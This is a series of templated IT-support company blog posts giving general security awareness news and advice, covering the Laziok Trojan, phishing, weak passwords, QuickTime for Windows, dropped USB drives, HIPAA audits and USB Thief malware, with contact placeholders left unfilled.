FireEye, a network security firm based in Milpitas, California, recently issued a report detailing how malevolent hackers are using Google Docs and PowerShell to transmit a Trojan virus referred to as “Laziok”. Anyone who owns or manages a business should be aware of this Trojan attack. Even those who use personal computers at home for non-business purposes are vulnerable to the attack as well. About the Laziok Trojan Attack The Laziok Trojan was first identified a year ago when employed in a multi-tiered attack against energy companies across the Middle East. The virus was actually pinpointed on a Polish hosting service website used by those energy businesses. Laziok is best described as a combination of a program that steals information and a reconnaissance tool. The malware was employed through a threat group’s exploitation of an antiquated Windows weakness tracked with the label of “CVE-2012-0158”. This vulnerability implements the Trojan directly onto users’ computers. Google Docs and Laziok The FireEye report indicates that hackers apparently devised a highly creative method of bypassing Google’s stringent security checks. The hackers then uploaded the Laziok Trojan to Google Docs. The malware was originally uploaded last March and remained in place until FireEye made Google aware of its presence. Google regularly scans and blocks potentially harmful content on Google Docs to prevent such malware from harming its customers’ computing devices. It was widely assumed that Google Docs users would not be able to download malicious files from the popular file sharing / editing service until Laziok hit. It is clear that the malware found a way to slide in past Google’s extensive security scans. Thankfully, the malicious file has been successfully removed by Google so that users can no longer fetch it. How the Laziok Trojan Attack Occurs The attack was launched by uploading a highly complicated JavaScript code to take advantage of the aforementioned Windows vulnerability that is now being referred to as “Unicorn”. A VBScript was used to exploit the vulnerability upon users’ requests to access the particular page in question through the popular web browser Internet Explorer. Attackers relied on a means of exploitation referred to as “Godmode” that permits code written with VBScript to compromise the web browser’s sandbox. The script then proceeds to leverage Microsoft Windows’ PowerShell, a management program that automates and configurates computing tasks. PowerShell has been regularly abused by cyber thieves, especially throughout the past couple of years. PowerShell is used to download the Laziok Trojan from Google Docs and promptly execute it. This management framework is also favored by hackers as it is able to quickly and easily evade anti-virus software as it injects payloads right into memory. After infecting a computing device, Laziok proceeds to gather extensive information about the system including all of its antivirus programs. IT Assistance for Small to Medium Sized Businesses {company} is the trusted choice when it comes to staying ahead of the latest information technology tips, tricks, and news. Contact us at {phone} or send us an email at {email} for more information.
In the world of cyber security, no topic is more important (or more derided) than that of passwords. Passwords are everywhere. They help personal users log into their online banking information, give system administrators in a business access to mission-critical file servers and more. Passwords as a concept are inherently secure; they’re the first line of defense between the user and an attacker who wants to do harm. The thing that makes passwords such a hot-button topic, however, ultimately rests with the users themselves. Simply having a password is not enough to keep anything safe in the digital age. Having a strong, complicated password is – but for many users, even in the world of business, this is often a lot easier said than done. The Problem with Passwords A number of studies are done on an annual basis which take a deeper look into the password-creation habits of users all over the world. One trend is overwhelmingly clear: users prefer simple, almost generic passwords above any other kind. Two of the most commonly used passwords are “12345” and “password” which, while they are technically passwords, pose a number of challenges that cannot be ignored. First, something like “12345” is incredibly easy to guess. You don’t even have to be a “hacker” in the strictest sense of the term to guess that password, you just have to try it out and get lucky. Another issue presented when a person uses a weak password is that it IS possible for sophisticated computer software to “guess” these terms or phrases during a brute force attack, unlocking the associated account in a startlingly short amount of time. When a user employs the password “12345” for their favorite movie-related website, that’s one thing. When a business user has the password “12345” on an online account holding important client financial information, you can begin to get an idea of just how serious this issue really is. Not All Passwords Are Created Equally One of the most important ways to remain safe in today’s online environment is through the creation of STRONG passwords that are a combination of not only numbers and letters, but also special symbols. “Aardvark1” may seem hard to guess to a human, but a computer can do it in a couple of minutes. “A@rdvark1!”, on the other hand, complicates things greatly and makes the password more difficult to crack. For the best results, a password shouldn’t actually be a word at all. The strongest passwords are not only long (many experts recommend a minimum of 12 characters), but are also completely incomprehensible. Something like “a2398urasdf&#()$+” would take years for even a powerful computer to come remotely close to guessing. The problem, however, is remembering dozens of complex passwords. Password managers were created for this exact purpose, as not only do they give users the ability to automatically generate strong passwords, but they then keep a record of all these passwords in a secure database so that users can refer to them in seconds when logging in online. If you live in {city} and would like additional information about how to make the types of strong passwords that will keep you and your private data safe, or if you’d like to sit down with someone and discuss any other IT and technology-related needs you may have, please don’t hesitate to call {phone} or email {email} to speak to someone at {company} today.
Emails masquerading as notifications from Financial Institutions are an ongoing challenge for consumers. While variations of this type of fraud attempt pop up all of the time, these “phishing” emails have become a regular occurrence. Remember that criminals are behind phishing emails. Their intention is to get at your personal information which they may use to commit financial fraud or identity theft If you are unsure if an email request is legitimate or not, take a few moments to verify the request before you give out information or click on a link. Just ensure that you verify the request using another source, not a source that is provided within the email itself. Remain wary of unsolicited email and always be cautious in your online activity. Those simple steps can help protect you from falling victim to a scam. Your best defense against these email scams remains knowing how to recognize them: 1. Phishing emails do not only begin with a generic greeting such as “Dear Client”. They can also address you directly by name or email address. 2. Beware of emails requiring your “immediate action” in order to prevent a service from being shut down unless you log on “now” or enter your personal, financial or credit card information. These are classic phishing email techniques and should always be viewed skeptically; 3. Be suspicious of all unsolicited emails that request personal information, even if you recognize the name of the sender. Though that email may contain your name and other information that applies to you, it may still be a scam; 4. Don’t be fooled by emails that offer “too good to be true” enticements, 5. Email scams regularly take advantage of timing and promote fraudsters’ phony websites: a. when tragic incidents occur, fake charity sites pop up; b. when “juicy” stories make the news, websites promising the latest pictures or information quickly surface; c. for sporting events, phony websites offer amazing deals on seating; d. on occasions such as tax season, emails try to scare you into entering personal information on a fake website; e. for annual holidays, fraudsters’ websites promise “unheard of” shopping deals. The goal of all of these scams is to get you to click on a link or access the fraudsters’ website. The result could be an automatic attempt to secretly load malicious code to your computer. Or the email or website could contain convincing tactics to get you to enter your credit card or other personal information that could be used to commit financial fraud against you. Charles J. Hammett Jr. President – CEO Hammett Technologies, LLC Office: 877-659-4399 x1201 | Fax: 443-408-6333
To say that cybercrime is an issue in today’s modern environment is something of a dramatic institute. According to research conducted by the Ponemon Institute, the average cost of just a single breach eclipsed $3.8 million in 2015. This breaks down to roughly $154 per compromised record, on average. With this in mind, it should come as a surprise to absolutely nobody that the Australian government has just announced a plan to spend $230 million to execute a new cybercrime strategy in that country. While the fact that they’re spending so much money isn’t necessarily noteworthy, exactly what they plan to do and how they plan to do it is something that businesses all over the world will want to pay attention to. What Spawned These Actions? If you had to make a list of all the countries that are being massively impacted by cybercrime, Australia would undoubtedly be right at the top. After experiencing an increased number of attacks including ransomware, DDoS (denial of service), cyberespionage and more, the cybercrime problem in the country has grown so great that it costs Australian citizens an estimated $1 billion each year. That $1 billion figure only takes into consideration “on-the-surface” costs of dealing with such an attack. When you consider all the factors that are difficult to put a price on, the real impact is estimated to be as high as $17 billion annually – or roughly 1 percent of the country’s entire gross domestic product. The major reason why Australia is launching this new initiative is to attempt to reduce that number as much as possible. What is Australia Doing? The $230 million Australia is planning to spend takes the form of a five part “plan of action” that will be executed over the next four years. The lion’s share of that money will go towards investment, both in terms of cybersecurity innovation in the country itself and to the creation of global partnerships with countries like the United States in an effort to shut down the various resources criminals use to thrive online. According to a report issued by The Guardian, the Australian government is expected to hire in excess of 100 new cybersecurity experts across all of its agencies in the short-term. An additional $20.4 million of that money will also be going to Australia’s federal police, with an additional $16 million investment headed to the crime commission to help threaten both their threat detection and their analytical and assessment capabilities. Australia’s plan may have the best of intentions, but it is certainly not without its criticisms. Many experts are deriding the Australian government due to their overall lack of transparency on the issue. They may be willing to specify exactly what they’re going to do to combat cybercrime, but they’ve been less than forthcoming about how bad the issue in the country has really been to this point. Many people also disagree with how such a large investment is being spent. While innovation is important, the majority of these funds seem to be attempting to solve a problem just by throwing as much money at it as possible. Many experts have also criticized the government’s plans as being reactive to past events instead of proactive to future ones, which is always considered to be one of the best ways to stay protected on a large scale in today’s modern environment. Instead of spending money to close gaps that have already been exploited, the government should be spending money to identify certain problem areas that still exist so that these types of issues can be avoided altogether as much as possible. If you’re in {city} and are interested in finding out more information about how countries like Australia are battling cybercrime, or if you’re trying to find answers to all of your important IT questions, please don’t hesitate to pick up the phone and call {phone} or email {email} to speak to someone at {company} today.
One of the most common types of cyber attacks that both businesses and personal users have to contend with today’s is called a “phishing” attack. In An attacker will pose as a legitimate company or other business contact in an attempt to steal valuable information from their victim. For, example, they may send a seemingly-legitimate e-mail asking for key information including passwords, financial data and more. If the victim falls for this scam (or gets “phished”) they’ve potentially exposed themselves and (in the case of businesses) their customers to harm. If you think that all phishing attacks are easy to spot if you know what you’re looking for, think again: toy giant Mattel recently lost $3 million after their own CEO became the sudden victim of a particularly sophisticated phishing attack. Phishing and Mattel: What Happened? On April 30, 2015, one of Mattel’s top-level executives based out of China received an e-mail that at first glance appeared unremarkable. It was a simple request to make a $3 million wire transfer to pay a new vendor based in that region. What followed was a perfect storm of failure and vulnerability all of which left Mattel’s bank account $3 million lighter. The phishing e-mail was impeccably timed. A new CEO had taken the company reins only during the previous month and Barbie sales numbers, particularly in areas like China were hitting lows they hadn’t seen in years. Against this background, the executive who received the e-mail was incredibly eager to please her new leader and followed Mattel’s protocol for wire transfers to the letter. Any transfer of this size required no less than two approvals both of which she received in the coming days. Only hours later after speaking directly to the new CEO who confirmed that he did not ask for any such wire transfer did panic set in at the administrative level. Mattel immediately called not only the sending and receiving banks but also the police and the FBI. The response they got was not what one would call “good news” – all entities confirmed that the funds were gone for good. Luckily, however, the story did not end there. Mattel did eventually get all $3 million back with the help of local and federal law enforcement but from a certain perspective the damage was already done. They were publicly embarrassed on a grand scale at a time where their reputation was wavering and confidence in their leadership was shaken to its core. Even if you don’t work at Mattel, there are a number of valuable lessons to take with you from this situation. Not only is phishing becoming increasingly common by the day but attackers are also becoming increasingly bolder – targeting a major corporate CEO directly was practically unheard of up to this point. Mattel’s public embarrassment also makes an incredibly compelling argument about the need for security awareness training for all employees, including those in HR, accounting and even the ones at the top of the proverbial food chain. If you’re in {city} and you’d like to find out more information about how to keep you and your data safe from phishing attacks, or if you’d like to make sure that you’re protected from the wide range of other cyber threats that we now face on a daily basis, please feel free to call {phone} or email {email} to speak to someone at {company} today.
Social media continues to be a primary method of keeping in touch with friends and family — whether they live near or far. The average American does not just sit down on their couch after a long day at work and browse through their favorite site for a few minutes, though. Today. people access these sites from their mobile devices while they are on the go as well. This constant exposure to these sites means that it is more likely that you will fall victim to an innocuous-looking scam. Sunglasses Scam Who hasn’t seen a post by a friend on their social media page prompting them to purchase a pair of their favorite sunglasses at a steep discount? This is the result of your friend’s account being hacked, though it might not be apparent that this is the case at first. Instead, you might think that they are actually doing you a favor. After all, with the many outlet shops and overstock opportunities today, it makes perfect sense that your favorite type of sunglasses would be heavily discounted and that your friend would think of you. How the Crooks Scam You Once you click on the link included in the ad your friend posted, you’ll typically see an array of sunglasses from your favorite brand. Curiously, all them will be marked down by the same percentage points. Perhaps, though that does not seem strange to you, so you decide to purchase a few pairs at the great, heavily discounted price. Instead of going to a secure site that is protected by an industry-standard SSL certification, so that your credit card information is encrypted, you’ll be taken to a non-secure website that offers no protection whatsoever. Instead, your credit card information is transmitted to the scam artist in plain text and can be exploited in the future. How to Protect Yourself First, if it looks like it is too good to be true, then it nearly always is. Don’t fall for heavily discounted items and inquire on the manufacturer’s website or social media page about the validity of the ads claims before you complete on online transaction. If you are the person whose account is generating these ads, first change your password, then remove all apps that look suspicious. Finally, run a thorough virus scan from a trusted manufacturer on your computer. Looking for a reliable IT support partner in {city} that offers security protection for your small business? We can help! Contact {company} us at {phone} or drop us an email at {email}.
Despite warnings from the United States Department of Homeland Security about two unpatched security holes in Apple’s QuickTime for Windows, it is estimated that at least half of all Window computer owners will not hear about the call to delete QuickTime immediately or have heard but will not get around to doing it. In addition, programs such as Adobe use QuickTime for Windows codecs in its “professional video, audio and digital imaging applications and native decoding of many .mov formats is available today.” Adobe at Risk Causes Users to Be at Risk While Adobe has promised to fix these dependencies quickly, if you run Adobe your computer may still be at risk after you remove QuickTime for Windows from your computer. Or, Adobe may not work at all until it is patched. Given Adobe’s general laziness when it comes to vulnerabilities in its software and especially its plugins, it might be best to avoid this program until Adobe or someone else releases a security patch. What Happened to QuickTime for Windows? QuickTime for Windows has two known security flaws uncovered by Trend Micro, an Internet security company that owns the Zero Day Initiative (ZDI). Although once a popular video software program, the technology spans more than 20 years and is outdated. ZDI notified Apple in late 2015 about these two flaws, but the public was not warned about the vulnerabilities until mid-April 2016 when ZDI in accordance with its own policies released to the public the information that there are two security vulnerabilities that the early January 2016 update did not repair. Apple’s response was to announce it was not going to update the security flaws and was stopping support for QuickTime for Windows. For the first time in a long time, Apple and the United States found something they can agree on – if you use QuickTime for Windows stop! – and immediately uninstall it from your machine. However, this only applies to QuickTime for Windows, if you run QuickTime on an Apple System you are safe. Until 2011, Apple included in downloads for iTunes for Windows the video player QuickTime for Windows, so there are tons of the software out there on Windows computers. Estimates are that at least half of users will not hear about this problem and of those that do, half will forget to remove the software. Any Solutions? Every computer owner knows that to keep his or her machine operating properly you need to apply all software patches, especially security updates. Apple has discontinued support for the program so there will be no updates. It seems that Homeland Security and Apple have the only solution possible – uninstall the program before it causes damage to you, your privacy, and confidential information. To do an uninstall on a Windows computer is easy. Step 1: Go to programs and features Step 2: Click on QuickTime for Windows Step 3: Click uninstall That’s it, your computer has eliminated this threat. Speaking of threats, ZDI says that it’s unaware of anyone being hacked from these security failures, but the threat is real and any black hat hacker can find his or way into a vulnerable Windows computer. Ironically, Apple continues to offer a free download of the unsupported and vulnerable software, but if you want to play . mov files on your Windows computer download the latest version of the Windows Media Player or software offered by sites such as VLC.
You Might Want to Think Again With flash-based storage devices like USB thumb drives becoming more affordable with each passing day, it’s common to find one – or many – laying around offices, classrooms and more. If you’re the type of person who stores important documents on a thumb drive and then doesn’t immediately put it away for safe keeping you may want to think again. According to a new study, many people almost instinctively plug USB flash drives that they find into the nearest computer and take a look at all the information contained inside. The Study The study in question was conducted by Google in association with both the University of Illinois and the University of Michigan. Researchers placed 297 different USB drives at different locations around campus always making sure to leave these little devices sitting around at different times of the day. The results were startling: between 45%-98% of all people who eventually found a drive eventually plugged it into a computer despite the fact that they did not own it. The shortest amount of time someone waited before plugging in a drive was just 6 minutes, meaning if you ever forget a flash drive behind in class you’d better act sooner rather than later to retrieve it. Interestingly, researchers tried a number of different ways to see if physical characteristics made a difference when people found flash drives that they didn’t own. Some of the 297 flash drives had labels on them while others didn’t. Some were sitting by themselves, while others were attached to a set of keys. Ultimately this made no difference: if someone found a flash drive, regardless of where, what time of day it was or how it looked they were incredibly likely to run to a computer and take a look at the contents. So What Does This Mean? Researchers indicated that the majority of people who found themselves unwitting participants in the study were victims of their own curiosity above all else. All of the flash drives had identical contents – a mixture of personal and professional materials. Instead of opening a resume (which one could assume had contact information that could be used to help the owner of the drive recover his or her property) the “participants” instead chose to look at personal items like vacation photos first. In the end, the study paints an important picture of the types of threats that are facing both personal and business users today. Everyone thinks that they must prepare for a massive hack or other cyber attack but this study shows that less advanced and almost naively technical attacks continue to be one of the most pressing threats facing computer users today. In terms of the business community the study also sheds light on just how important security awareness training really is. Remember that it isn’t just the personal documents on the flash drive that could be exposed – if an employee plugs in a flash drive that they don’t own that is loaded with malicious software they could be exposing themselves and an entire business to digital harm. If you’re in {city} and you’d like to find out more information about keeping your important data safe while storing it on a USB flash drive, or if you’re in need of any other assistance regarding IT and technology-related topics, please feel free to call {phone} or email {email} to speak to a representative at {company} today. We’re always available to answer any questions or address any concerns that you may have.
In its long-awaited Phase 2 audits, the Health and Human Services Department’s Office for Civil Rights (OCR) moved forward with ensuring compliance with federal privacy laws. The first phase, which launched in 2012, involved an OCR assessment of 115 covered entities. In March 2016, this second phase of audits was announced. During it, the procedures and policies that these entities ‒ as well as their related business associates ‒ currently have in place will be evaluated with an eye to their compliance with the requirements and regulations of the Health Insurance Portability and Accountability Act, better known as HIPAA. A Multi-Step Process Phase 2 will encompass several different steps. The first step involves the verification of an entity’s contact information and address. The OCR is sending out emails to those entities that are covered ‒ as well as their business associates that are also covered ‒ urging them to provide this information. It should be noted that entities that do not comply with this request could still be subjected to an audit. The OCR reminded these firms to be diligent about checking their spam folders and to update any filters that might stop emails from the agency. Step Two of Phase 2 Step two of Phase 2 of this process will involve OCR sending covered entities a screening questionnaire that asks for more detailed information. Once this information is received, the agency expects to create audit pools that represent a broad range of covered entities, such as health plans, health care providers and other categories. From these audit pools, random entities will be chosen for the auditing process. Two Kinds of Audits The audits expected to be performed during Phase 2 include both those on-site and the desk. OCR issued details about the audit timelines on its website. At this writing, the agency expects to complete all desk audits by December 2016. OCR has not divulged the number of audits it aims to complete overall during Phase 2. The information will be used by the agency to develop audit reports that are designed to improve compliance and reduce the number of breaches within the system. Ensuring that your business is HIPAA compliant is vital to its success. Partnering with a reliable IT support firm in {city} will protect your small business against potential issues. Give {company} a call at {phone} or drop us an email at {email}.
By now, most people are aware of the harm that both viruses and malware can do to your sensitive information. This is also an issue that small businesses need to be concerned about as their financial and customer information could be compromised. A new threat, USB Thief, means that computer users might not even realize their data has been hacked because the mechanism that has done so is armed with a method of self-protection. How USB Thief Works As researchers have recently discovered, USB Thief relies on using a USB device to attack an air-gapped computer or an isolated server. Once it attacks, USB Thief leaves nothing behind to alert you to its presence. While other types of malware use traditional methods of spreading, such as attaching itself to shortcuts and autorun files that then enable it to spread, USB Thief is a different animal altogether, making it a challenge to discover. Piggybacking on USBs Much like its name suggests, USB Thief gains entry to your system by piggybacking on portable thumb drives that contain those applications that you use the most, such as Firefox, TrueCrypt and NotePad++. It then takes up residence within the application’s chain command using a plugin or a library that is dynamically linked. The result? When the target host is running, the malware is also running quietly and unobtrusively in the background without your knowledge. It does so by utilizing six files — four that are executable and two that are loaded with configuration data. How to Protect Yourself from USB Thief The research firm that discovered USB Thief noted that the malware was particularly difficult to break down. This is partially due to the fact that the malware executes three payloads with the ability to steal data with each instance. USB Thief also protects itself by making a different filename with each piece of malware that it executes. While this particular piece of malware is not widespread as of this writing, it has the potential to do a great deal of damage. It is advisable to turn the autorun feature of any computers off and to avoid using thumb drives from any unknown sources. Malware can cause numerous problems for your small business. Protect it and yourself by engaging a reliable IT support partner in {city}. Give {company} a call at {phone} or drop us an email at {email}.